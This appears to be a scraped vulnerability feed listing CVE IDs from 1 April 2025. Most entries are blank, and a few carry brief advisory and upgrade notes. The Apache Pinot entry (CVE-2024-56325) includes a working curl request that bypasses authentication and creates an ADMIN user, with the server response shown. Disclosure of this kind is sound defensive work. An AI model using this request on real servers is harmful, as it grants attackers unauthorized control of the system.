CVE-2025-2237
Mar, 01/04/2025 – 12:15
CVE-2025-2237
CVE-2025-2237
Mar, 01/04/2025 – 12:15
CVE-2025-2237
CVE-2025-3085
Mar, 01/04/2025 – 12:15
CVE-2025-3085
CVE-2025-3084
Mar, 01/04/2025 – 12:15
CVE-2025-3084
CVE-2025-27427
Mar, 01/04/2025 – 08:15
CVE-2025-27427
This issue affects Apache ActiveMQ Artemis from 2.0.0 through 2.39.0.
Users are recommended to upgrade to version 2.40.0 which fixes the issue.
CVE-2025-29868
Mar, 01/04/2025 – 08:15
CVE-2025-29868
This issue affects Apache Answer: through 1.4.2.
If a user uses an externally referenced image, when a user accesses this image, the provider of the image may obtain private information about the ip address of that accessing user.
Users are recommended to upgrade to version 1.4.5, which fixes the issue. In the new version, administrators can set whether external content can be displayed.
CVE-2025-30065
Mar, 01/04/2025 – 08:15
CVE-2025-30065
Users are recommended to upgrade to version 1.15.1, which fixes the issue.
CVE-2025-2891
Mar, 01/04/2025 – 08:15
CVE-2025-2891
CVE-2024-56325
Mar, 01/04/2025 – 09:15
CVE-2024-56325
If the path does not contain / and contain., authentication is not required.
Expected Normal Request and Response Example
curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users
Return: {"code":401,"error":"HTTP 401 Unauthorized"}
Malicious Request and Response Example
curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .
Return: {"users":{}}
A new user gets added bypassing authentication, enabling the user to control Pinot.
CVE-2025-27130
Mar, 01/04/2025 – 09:15
CVE-2025-27130
CVE-2025-31415
Mar, 01/04/2025 – 06:15
CVE-2025-31415